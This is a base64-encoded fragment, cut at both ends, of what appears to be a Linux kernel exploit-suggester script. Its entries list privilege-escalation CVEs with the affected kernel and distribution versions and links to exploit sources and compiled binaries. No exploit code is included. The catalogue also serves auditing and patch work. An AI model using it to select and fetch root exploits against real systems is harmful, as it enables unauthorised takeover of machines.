iLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L3B0cmFjZS1rbW9kCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjY0MS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3B0cmFjZV9rbW9kMi02NApleHBsb2l0LWRiOiAxNTAyMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTExNDZdJHt0eHRyc3R9IHJlaXNlcmZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD0yLjYuMzQKVGFnczogdWJ1bnR1PTkuMTAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vam9uLm9iZXJoZWlkZS5vcmcvYmxvZy8yMDEwLzA0LzEwL3JlaXNlcmZzLXJlaXNlcmZzX3ByaXYtdnVsbmVyYWJpbGl0eS8Kc3JjLXVybDogaHR0cHM6Ly9qb24ub2JlcmhlaWRlLm9yZy9maWxlcy90ZWFtLWVkd2FyZC5weQpleHBsb2l0LWRiOiAxMjEzMApjb21tZW50czogUmVxdWlyZXMgYSBSZWlzZXJGUyBmaWxlc3lzdGVtIG1vdW50ZWQgd2l0aCBleHRlbmRlZCBhdHRyaWJ1dGVzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMjk1OV0ke3R4dHJzdH0gY2FuX2JjbQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE4LHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLTI0LWdlbmVyaWN9ClJhbms6IDEKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvY2FuX2JjbQpleHBsb2l0LWRiOiAxNDgxNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTM5MDRdJHt0eHRyc3R9IHJkcwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjMwLHZlcjwyLjYuMzcKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMXwzMnwzNHwzNSktKDF8dHJ1bmspLWFtZDY0fSx1YnVudHU9MTAuMTB8OS4xMCxmZWRvcmE9MTN7a2VybmVsOjIuNi4zMy4zLTg1LmZjMTMuaTY4Ni5QQUV9LHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLSgyMXwyNCktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYXJjaGl2ZS8xLzUxNDM3OQpzcmMtdXJsOiBodHRwOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDEwMTAyMDA0NDA0OC9odHRwOi8vd3d3LnZzZWN1cml0eS5jb20vZG93bmxvYWQvdG9vbHMvbGludXgtcmRzLWV4cGxvaXQuYwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2NDEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9yZHMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcmRzNjQKZXhwbG9pdC1kYjogMTUyODUKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zODQ4LENWRS0yMDEwLTM4NTAsQ1ZFLTIwMTAtNDA3M10ke3R4dHJzdH0gaGFsZl9uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oMTAuMDR8OS4xMCl7a2VybmVsOjIuNi4oMzF8MzIpLSgxNHwyMSktc2VydmVyfQpSYW5rOiAxCmJpbi11cmw6IGh0dHA6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvaGFsZi1uZWxzb24zCmV4cGxvaXQtZGI6IDE3Nzg3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bTi9BXSR7dHh0cnN0fSBjYXBzX3RvX3Jvb3QKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zNCx2ZXI8PTIuNi4zNix4ODYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtOL0FdJHt0eHRyc3R9IGNhcHNfdG9fcm9vdCAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzQsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MzQ3XSR7dHh0cnN0fSBhbWVyaWNhbi1zaWduLWxhbmd1YWdlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zNgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE1Nzc0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzQzN10ke3R4dHJzdH0gcGt0Y2R2ZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjA0ClJhbms6IDEKZXhwbG9pdC1kYjogMTUxNTAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zMDgxXSR7dHh0cnN0fSB2aWRlbzRsaW51eApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzMKVGFnczogUkhFTD01ClJhbms6IDEKZXhwbG9pdC1kYjogMTUwMjQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2XSR7dHh0cnN0fSBtZW1vZGlwcGVyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTMuMS4wClRhZ3M6IHVidW50dT0oMTAuMDR8MTEuMTApe2tlcm5lbDozLjAuMC0xMi0oZ2VuZXJpY3xzZXJ2ZXIpfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXQuengyYzQuY29tL0NWRS0yMDEyLTAwNTYvYWJvdXQvCnNyYy11cmw6IGh0dHBzOi8vZ2l0Lnp4MmM0LmNvbS9DVkUtMjAxMi0wMDU2L3BsYWluL21lbXBvZGlwcGVyLmMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvbWVtb2RpcHBlcgpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9tZW1vZGlwcGVyNjQKZXhwbG9pdC1kYjogMTg0MTEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2LENWRS0yMDEwLTM4NDksQ1ZFLTIwMTAtMzg1MF0ke3R4dHJzdH0gZnVsbC1uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oOS4xMHwxMC4xMCl7a2VybmVsOjIuNi4oMzF8MzUpLSgxNHwxOSktKHNlcnZlcnxnZW5lcmljKX0sdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItKDIxfDI0KS1zZXJ2ZXJ9ClJhbms6IDEKc3JjLXVybDogaHR0cDovL3Z1bG5mYWN0b3J5Lm9yZy9leHBsb2l0cy9mdWxsLW5lbHNvbi5jCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uNjQKZXhwbG9pdC1kYjogMTU3MDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0xODU4XSR7dHh0cnN0fSBDTE9ORV9ORVdVU0VSfENMT05FX0ZTClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPTMuOCxDT05GSUdfVVNFUl9OUz15ClRhZ3M6IApSYW5rOiAxCnNyYy11cmw6IGh0dHA6Ly9zdGVhbHRoLm9wZW53YWxsLm5ldC94U3BvcnRzL2Nsb3duLW5ld3VzZXIuYwphbmFseXNpcy11cmw6IGh0dHBzOi8vbHduLm5ldC9BcnRpY2xlcy81NDMyNzMvCmV4cGxvaXQtZGI6IDM4MzkwCmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQgCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45LHg4Nl82NApUYWdzOiBSSEVMPTYsdWJ1bnR1PTEyLjA0e2tlcm5lbDozLjIuMC0oMjN8MjkpLWdlbmVyaWN9LGZlZG9yYT0xNntrZXJuZWw6My4xLjAtNy5mYzE2Lng4Nl82NH0sZmVkb3JhPTE3e2tlcm5lbDozLjMuNC01LmZjMTcueDg2XzY0fSxkZWJpYW49N3trZXJuZWw6My4yLjAtNC1hbWQ2NH0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8KYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcGVyZl9zd2V2ZW50CmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3BlcmZfc3dldmVudDY0CmV4cGxvaXQtZGI6IDI2MTMxCmF1dGhvcjogQW5kcmVhICdzb3JibycgQml0dGF1CkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMix2ZXI8My44LjkseDg2XzY0ClRhZ3M6IHVidW50dT0xMi4wNHtrZXJuZWw6My4oMnw1KS4wLSgyM3wyOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8Kc3JjLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2V4cGxvaXRzL3ZuaWtfdjEuYwpleHBsb2l0LWRiOiAzMzU4OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMDI2OF0ke3R4dHJzdH0gbXNyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPDMuNy42ClRhZ3M6IApSYW5rOiAxCmV4cGxvaXQtZGI6IDI3Mjk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMTk1OV0ke3R4dHJzdH0gdXNlcm5zX3Jvb3Rfc3Bsb2l0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My44LjkKVGFnczogClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxMy8wNC8yOS8xCmV4cGxvaXQtZGI6IDI1NDUwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gc2VtdGV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45ClRhZ3M6IFJIRUw9NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3RpbWV0b2JsZWVkLmNvbS9hLWNsb3Nlci1sb29rLWF0LWEtcmVjZW50LXByaXZpbGVnZS1lc2NhbGF0aW9uLWJ1Zy1pbi1saW51eC1jdmUtMjAxMy0yMDk0LwpleHBsb2l0LWRiOiAyNTQ0NApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAwMzhdJHt0eHRyc3R9IHRpbWVvdXRwd24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuNC4wLHZlcjw9My4xMy4xLENPTkZJR19YODZfWDMyPXkKVGFnczogdWJ1bnR1PTEzLjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vYmxvZy5pbmNsdWRlc2VjdXJpdHkuY29tLzIwMTQvMDMvZXhwbG9pdC1DVkUtMjAxNC0wMDM4LXgzMi1yZWN2bW1zZy1rZXJuZWwtdnVsbmVyYWJsaXR5Lmh0bWwKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvdGltZW91dHB3bjY0CmV4cGxvaXQtZGI6IDMxMzQ2CkNvbW1lbnRzOiBDT05GSUdfWDg2X1gzMiBuZWVkcyB0byBiZSBlbmFibGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDAzOF0ke3R4dHJzdH0gdGltZW91dHB3biAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjQuMCx2ZXI8PTMuMTMuMSxDT05GSUdfWDg2X1gzMj15ClRhZ3M6IHVidW50dT0oMTMuMDR8MTMuMTApe2tlcm5lbDozLig4fDExKS4wLSgxMnwxNXwxOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9ibG9nLmluY2x1ZGVzZWN1cml0eS5jb20vMjAxNC8wMy9leHBsb2l0LUNWRS0yMDE0LTAwMzgteDMyLXJlY3ZtbXNnLWtlcm5lbC12dWxuZXJhYmxpdHkuaHRtbApleHBsb2l0LWRiOiAzMTM0NwpDb21tZW50czogQ09ORklHX1g4Nl9YMzIgbmVlZHMgdG8gYmUgZW5hYmxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAxOTZdJHt0eHRyc3R9IHJhd21vZGVQVFkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMSx2ZXI8PTMuMTQuMwpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2Jsb2cuaW5jbHVkZXNlY3VyaXR5LmNvbS8yMDE0LzA2L2V4cGxvaXQtd2Fsa3Rocm91Z2gtY3ZlLTIwMTQtMDE5Ni1wdHkta2VybmVsLXJhY2UtY29uZGl0aW9uLmh0bWwKZXhwbG9pdC1kYjogMzM1MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC0yODUxXSR7dHh0cnN0fSB1c2UtYWZ0ZXItZnJlZSBpbiBwaW5nX2luaXRfc29jaygpICR7YmxkYmx1fShEb1MpJHt0eHRyc3R9ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTQKVGFnczogClJhbms6IDAKYW5hbHlzaXMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vcGFnZT9uPTAyMDEyMDE2CmV4cGxvaXQtZGI6IDMyOTI2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNDAxNF0ke3R4dHJzdH0gaW5vZGVfY2FwYWJsZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjEzClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDYvMTAvNApleHBsb2l0LWRiOiAzMzgyNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTQ2OTldJHt0eHRyc3R9IHB0cmFjZS9zeXNyZXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjw9My44ClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDcvMDgvMTYKZXhwbG9pdC1kYjogMzQxMzQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC00OTQzXSR7dHh0cnN0fSBQUFBvTDJUUCAke2JsZGJsdX0oRG9TKSR7dHh0cnN0fQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9My4xNS42ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL3BhZ2U/bj0wMTEwMjAxNQpleHBsb2l0LWRiOiAzNjI2NwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTUyMDddJHt0eHRyc3R9IGZ1c2Vfc3VpZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjE2LjEKVGFnczogClJhbms6IDEKZXhwbG9pdC1kYjogMzQ5MjMKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS05MzIyXSR7dHh0cnN0fSBCYWRJUkVUClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My4xNy41LHg4Nl82NApUYWdzOiBSSEVMPD03LGZlZG9yYT0yMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xhYnMuYnJvbWl1bS5jb20vMjAxNS8wMi8wMi9leHBsb2l0aW5nLWJhZGlyZXQtdnVsbmVyYWJpbGl0eS1jdmUtMjAxNC05MzIyLWxpbnV4LWtlcm5lbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi8Kc3JjLXVybDogaHR0cDovL3NpdGUucGkzLmNvbS5wbC9leHAvcF9jdmUtMjAxNC05MzIyLnRhci5negpleHBsb2l0LWRiOgphdXRob3I6IFJhZmFsICduM3JnYWwnIFdvanRjenVrICYgQWRhbSAncGkzJyBaYWJyb2NraQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyOTBdJHt0eHRyc3R9IGVzcGZpeDY0X05NSQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMyx2ZXI8NC4xLjYseDg2XzY0ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDgvMDQvOApleHBsb2l0LWRiOiAzNzcyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W04vQV0ke3R4dHJzdH0gYmx1ZXRvb3RoClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA0NzU2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTMyOF0ke3R4dHJzdH0gb3ZlcmxheWZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEzLjAsdmVyPD0zLjE5LjAKVGFnczogdWJ1bnR1PSgxMi4wNHwxNC4wNCl7a2VybmVsOjMuMTMuMC0oMnwzfDR8NSkqLWdlbmVyaWN9LHVidW50dT0oMTQuMTB8MTUuMDQpe2tlcm5lbDozLigxM3wxNikuMC0qLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNS9xMi83MTcKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvb2ZzXzMyCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL29mc182NApleHBsb2l0LWRiOiAzNzI5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTg2NjBdJHt0eHRyc3R9IG92ZXJsYXlmcyAob3ZsX3NldGF0dHIpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuMy4zClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTUvVXNlck5hbWVzcGFjZU92ZXJsYXlmc1NldHVpZFdyaXRlRXhlYy8KZXhwbG9pdC1kYjogMzkyMzAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjYwXSR7dHh0cnN0fSBvdmVybGF5ZnMgKG92bF9zZXRhdHRyKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjMuMwpUYWdzOiB1YnVudHU9KDE0LjA0fDE1LjEwKXtrZXJuZWw6NC4yLjAtKDE4fDE5fDIwfDIxfDIyKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE1L1VzZXJOYW1lc3BhY2VPdmVybGF5ZnNTZXR1aWRXcml0ZUV4ZWMvCmV4cGxvaXQtZGI6IDM5MTY2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMDcyOF0ke3R4dHJzdH0ga2V5cmluZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMCx2ZXI8NC40LjEKVGFnczoKUmFuazogMAphbmFseXNpcy11cmw6IGh0dHA6Ly9wZXJjZXB0aW9uLXBvaW50LmlvLzIwMTYvMDEvMTQvYW5hbHlzaXMtYW5kLWV4cGxvaXRhdGlvbi1vZi1hLWxpbnV4LWtlcm5lbC12dWxuZXJhYmlsaXR5LWN2ZS0yMDE2LTA3MjgvCmV4cGxvaXQtZGI6IDQwMDAzCkNvbW1lbnRzOiBFeHBsb2l0IHRha2VzIGFib3V0IH4zMCBtaW51dGVzIHRvIHJ1bi4gRXhwbG9pdCBpcyBub3QgcmVsaWFibGUsIHNlZTogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2Jsb2cvY3ZlLTIwMTYtMDcyOC1wb2Mtbm90LXdvcmtpbmcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0yMzg0XSR7dHh0cnN0fSB1c2ItbWlkaQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjQuOApUYWdzOiB1YnVudHU9MTQuMDQsZmVkb3JhPTIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hhaXJ5LmdpdGh1Yi5pby9ibG9nLzIwMTYvY3ZlLTIwMTYtMjM4NApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi0yMzg0L3BvYy5jCmV4cGxvaXQtZGI6IDQxOTk5CkNvbW1lbnRzOiBSZXF1aXJlcyBhYmlsaXR5IHRvIHBsdWcgaW4gYSBtYWxpY2lvdXMgVVNCIGRldmljZSBhbmQgdG8gZXhlY3V0ZSBhIG1hbGljaW91cyBiaW5hcnkgYXMgYSBub24tcHJpdmlsZWdlZCB1c2VyCmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDk5N10ke3R4dHJzdH0gdGFyZ2V0X29mZnNldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPD00LjQuMCxjbWQ6Z3JlcCAtcWkgaXBfdGFibGVzIC9wcm9jL21vZHVsZXMKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzQwMDUzLnppcApDb21tZW50czogaXBfdGFibGVzLmtvIG5lZWRzIHRvIGJlIGxvYWRlZApleHBsb2l0LWRiOiA0MDA0OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDU1N10ke3R4dHJzdH0gZG91YmxlLWZkcHV0KCkKUmVxczogcGtnPWx